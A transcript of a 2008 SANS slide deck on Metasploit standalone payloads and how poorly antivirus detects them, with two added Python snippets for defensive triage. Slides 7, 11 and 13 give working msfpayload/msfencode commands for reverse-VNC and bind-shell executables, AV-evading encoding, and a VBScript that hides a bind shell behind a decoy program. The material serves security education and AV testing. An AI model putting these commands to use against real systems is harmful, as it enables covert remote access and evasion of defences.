Metasploit Payloads and Antivirus - PowerPoint PPT Presentation

About This Presentation
Title:

Metasploit Payloads and Antivirus

Description:

Learn how an attacker might use Metasploit standalone payloads against you ... Demonstration. See how these payloads are created ...

Number of Views:116
Avg rating:3.0/5.0
Slides: 16
Provided by: sans4

Transcript and Presenter's Notes

Title: Metasploit Payloads and Antivirus


1
Metasploit Payloads and Antivirus
  • Mark Baggett
  • December 2008
  • GIAC GSEC GCIH

2
Objectives
  • Learn how an attacker might use Metasploit
    standalone payloads against you
  • See how these payloads are created, used and
    trojanized
  • Understand what level of protection to expect
    from your antivirus

3
How are they used against you?
  • Can be executed by tricking a user into running
    the payload or via an exploit that is not in the
    framework
  • Execute a payload on a fully patched system
  • Use Meterpreter's advanced functionality such as
    anti-forensics, detection evasion, and pivoting
  • Scenario
  • Attacker brute-forces the password to a fully patched
    machine
  • Runs Meterpreter payload and uses it to pivot
  • Uses framework to attack other hosts on DMZ

4
msfpayload
  • Generates payloads in various formats
  • Source code in C, Perl, Ruby, Java
  • Hexadecimal (RAW)
  • Binary executable formats for Win32 Linux OS X
    on Intel, PPC, iPhone
  • Java automatically selects Big Endian or Little
    Endian depending upon processor of targeted
    payload
  • You can override this with a simple modification
    to msfpayload (js_be, js_le)

5
Demonstration
  • See how these payloads are created

6
Interacting with payloads
  • Some payloads will not work standalone
  • find_port, find_tag
  • Bind shell payloads can be used outside of the
    framework
  • Others require the use of the multi/handler
    exploit

7
Using multi/handler
CREATION - LHOST is the attacker's IP
  • ./msfpayload windows/vncinject/reverse_tcp \
    LHOST=192.168.100.5 X > vncrev.exe
USE - RHOST is the victim's IP
  • ./msfcli exploit/multi/handler \
    PAYLOAD=windows/vncinject/reverse_tcp \
    RHOST=192.168.100.3 DisableCourtesyShell=TRUE E

8
Demonstration
  • See how these payloads are used

9
msfencode
  • Will encode a payload using one of various
    algorithms
  • Expects RAW msfpayload as input
  • -h for help
  • -l list of available encoders
  • -e encoder to use
  • -t output type
  • -b characters to avoid

10
msfencode -> Binary
  • Binary was not a selectable output type from
    msfencode until Sept 29th 2008
  • 3 ways to create a binary
  • Add 3 lines of code to msfencode
  • Generate RAW output and use a hex editor to place
    it in a binary PE format
  • Generate C source code and compile it
  • -t exe option will encode a Windows binary

11
msfencode (continued)
  • ./msfpayload windows/shell_bind_tcp R | \
    ./msfencode -e x86/shikata_ga_nai -t exe
  • ./msfpayload windows/shell_bind_tcp R | \
    ./msfencode -e x86/shikata_ga_nai -b '\x41\x42\x43' \
    -t exe
  • Text.to_win32pe() uses /data/templates
  • Use your own binaries with PAYLOAD tag
  • To_win32pe chooses a random base relocation
    address (4 bytes at position 0x88)
  • Roll your own with template.c
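As an added example (not from the presentation and not Metasploit's own code), the Python below shows how an analyst can compare binaries built from the same PE template while ignoring the 4 bytes at 0x88 that the slide says to_win32pe randomizes: a header-only hash with that field zeroed stays stable across builds, whereas the plain file hash changes every time. Assumptions: the template's headers otherwise survive untouched (the slide's PAYLOAD-tag bullet indicates the payload is dropped into the body), the header length 0x200, the build_sample helper and its minimal MZ/PE bytes are all constructed here, and pe_field_at maps only the PE signature and COFF header, so it just reports which field the offset falls in for a given e_lfanew.

```python
import hashlib
import struct

# File offset and width of the 4 bytes the slide says to_win32pe randomizes.
RANDOMIZED_OFFSET = 0x88
RANDOMIZED_LEN = 4

# (relative offset from e_lfanew, size, name) for the PE signature + COFF header.
_COFF_FIELDS = [
    (0, 4, "Signature"),
    (4, 2, "Machine"),
    (6, 2, "NumberOfSections"),
    (8, 4, "TimeDateStamp"),
    (12, 4, "PointerToSymbolTable"),
    (16, 4, "NumberOfSymbols"),
    (20, 2, "SizeOfOptionalHeader"),
    (22, 2, "Characteristics"),
]


def pe_field_at(data: bytes, offset: int) -> str:
    """Name the header field a file offset lands in, using e_lfanew from the DOS header.

    Hypothetical helper: only the signature and COFF header are mapped.
    """
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    rel = offset - e_lfanew
    for start, size, name in _COFF_FIELDS:
        if start <= rel < start + size:
            return name
    return "outside mapped headers"


def template_fingerprint(data: bytes, header_len: int = 0x200,
                         offset: int = RANDOMIZED_OFFSET,
                         length: int = RANDOMIZED_LEN) -> str:
    """SHA-256 of the first header_len bytes with the randomized field zeroed.

    Assumption: the template's headers are unchanged apart from those bytes, so
    two binaries built from the same template share this fingerprint.
    """
    if len(data) < header_len:
        raise ValueError("image shorter than the header region")
    buf = bytearray(data[:header_len])
    buf[offset:offset + length] = b"\x00" * length
    return hashlib.sha256(buf).hexdigest()


def full_sha256(data: bytes) -> str:
    """Plain file hash, for contrast: it changes with every randomized build."""
    return hashlib.sha256(data).hexdigest()


def same_template(a: bytes, b: bytes) -> bool:
    return template_fingerprint(a) == template_fingerprint(b)


def build_sample(stamp: int, payload: bytes = b"") -> bytes:
    """Constructed minimal MZ/PE header (not a real executable) with e_lfanew = 0x80.

    The 4 bytes at 0x88 are `stamp`; headers are padded to 0x200 and the
    payload bytes follow, standing in for the template's PAYLOAD region.
    """
    dos = bytearray(0x80)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)          # e_lfanew -> 0x80
    coff = struct.pack("<4sHHIIIHH", b"PE\0\0",      # signature
                       0x14C, 1, stamp, 0, 0,        # i386, 1 section, stamp at 0x88
                       0xE0, 0x102)                   # opt hdr size, characteristics
    header = bytes(dos) + coff
    header += b"\x00" * (0x200 - len(header))
    return header + payload


if __name__ == "__main__":
    a = build_sample(0x11111111, b"payload-A")
    b = build_sample(0x22222222, b"payload-B")
    print("field at 0x88:", pe_field_at(a, 0x88))
    print("same template:", same_template(a, b))
    print("same file hash:", full_sha256(a) == full_sha256(b))
```

The fixed offset only means something for binaries produced from the same template, so the fingerprint is a way to group samples in triage rather than a general detection signature; in the constructed sample, offset 0x88 falls on the COFF TimeDateStamp field, but for a real template the mapping depends on that template's own e_lfanew.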

12
Turning payloads into trojans
  • IExpress is a setup utility that comes with
    Windows XP
  • Can create packages that visibly execute a benign
    host program and invisibly execute a malicious
    payload
  • All you need is a small VBscript to execute your
    payload invisibly
  • Trojan payloads only temporarily avoid antivirus

13
Payload script
  • The script
  • Set WshShell = WScript.CreateObject("WScript.Shell")
  • WshShell.Run "mspaint.exe", 1, False
  • WshShell.Run "bindshell.exe", 0, False
  • Quick IExpress Demonstration
  • See how these payloads are trojanized
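As an added example (not from the presentation), the Python below scans a WSH script for the decoy pattern the slide describes: one program started with a visible window and another started with WshShell.Run's window style 0, which hides it. Assumptions: the regex only recognises the literal form `obj.Run "command", style, wait` (no variables or string concatenation), and the two sample scripts, one reproducing the slide's three lines and one benign launcher, are constructed here.

```python
import re
from dataclasses import dataclass
from typing import Dict, List

# WshShell.Run "command", intWindowStyle, bWaitOnReturn
# intWindowStyle 0 hides the window; 1 activates and displays it.
RUN_CALL = re.compile(
    r'(?P<obj>\w+)\.Run\s+"(?P<cmd>[^"]+)"\s*,\s*(?P<style>\d+)\s*,\s*(?P<wait>True|False)',
    re.IGNORECASE,
)
SHELL_OBJECT = re.compile(r'CreateObject\(\s*"WScript\.Shell"\s*\)', re.IGNORECASE)


@dataclass
class RunCall:
    line_no: int
    command: str
    window_style: int
    wait: bool

    @property
    def hidden(self) -> bool:
        return self.window_style == 0


def parse_run_calls(script: str) -> List[RunCall]:
    """Collect every literal .Run call in the script, one per line."""
    calls: List[RunCall] = []
    for line_no, line in enumerate(script.splitlines(), start=1):
        m = RUN_CALL.search(line)
        if m:
            calls.append(RunCall(line_no, m.group("cmd"), int(m.group("style")),
                                 m.group("wait").lower() == "true"))
    return calls


def assess(script: str) -> Dict[str, object]:
    """Summarise what the script launches and whether it shows the decoy pattern."""
    calls = parse_run_calls(script)
    hidden = [c.command for c in calls if c.hidden]
    visible = [c.command for c in calls if not c.hidden]
    return {
        "creates_shell": bool(SHELL_OBJECT.search(script)),
        "hidden": hidden,
        "visible": visible,
        # Decoy pattern: something shown to the user plus something run hidden.
        "decoy_pattern": bool(hidden) and bool(visible),
    }


# Constructed sample: the three-line script from the slide.
SLIDE_SCRIPT = '''Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "mspaint.exe",1, False
WshShell.Run "bindshell.exe",0, False
'''

# Constructed benign sample: a launcher that shows everything it runs.
BENIGN_SCRIPT = '''Set sh = CreateObject("WScript.Shell")
sh.Run "notepad.exe", 1, True
'''

if __name__ == "__main__":
    for name, script in (("slide", SLIDE_SCRIPT), ("benign", BENIGN_SCRIPT)):
        print(name, assess(script))
```

Window style 0 is not malicious on its own (plenty of administrative scripts hide console windows), so the useful signal is the combination: a visible launch paired with a hidden one in the same short script, which is exactly the IExpress trick the slide relies on.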

14
Level of protection to expect from your antivirus
  • Expected results: a low rate of detection for
    unencoded payloads and no detection for encoded
    payloads
  • Actual results: no detection for unencoded
    payloads or encoded payloads
  • 2 products' heuristics flagged the payloads
  • Pauldotcom Episode 125 at the end of September
    2008 found 6 systems detected the payload
  • My HIPS testing yielded disappointing results
  • HD Moore has stated that version 3.2 will
    generate a new Windows Binary that is harder to
    detect.

15
Summary
  • Metasploit is a powerful framework with a diverse
    set of tools
  • Using these tools attackers can easily create
    standalone payloads that run on fully patched
    systems
  • Antivirus products do not at this time provide
    adequate protection against Metasploit payloads
  • My paper is in the SANS reading room titled
    Effectiveness of Antivirus Detecting Metasploit
    Payloads